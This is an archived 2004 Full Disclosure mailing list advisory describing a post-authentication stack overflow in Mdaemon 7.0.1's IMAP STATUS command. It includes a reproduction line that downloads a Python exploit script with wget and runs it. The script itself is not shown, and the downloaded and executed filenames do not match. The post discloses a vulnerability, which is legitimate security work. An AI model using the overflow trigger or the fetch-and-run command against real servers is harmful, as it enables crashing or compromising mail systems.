Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Mdaemon 7.0.1 IMAP overflow.

From: ned <nd () felinemenace org>
Date: Tue, 11 May 2004 22:26:13 -0700 (PDT)
Let it be known that this bug is after authentication ("postauth") and 
therefore useless.

In the current version of Mdaemon from ALTN there exists an easy to 
exploit, run-of-the-mill stack overflow.

By authenticating and sending a large argument to the STATUS command in 
the IMAP component, a buffer will be overflown, and a access violation 
will be caused.

To reproduce:
cd SMUDGE;wget 
http://felinemenace.org/~nd/SMUDGE/Mdaemon/Mdaemon7.0.1Stack.py; python 
Mdaemon7.0.0.1Stack.py.

Change the user and password first.

Thanks to:
- Dave Aitel for his neet spike scripts which convert to SMUDGE scripts 
quite easily :)
- rootkit.com

Not sure if the vendor knows about it.

Thanks,
nd

ps: second public release from the UBC, we have to make space for the new 
vulns :)
-- 
http://felinemenace.org/~nd

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: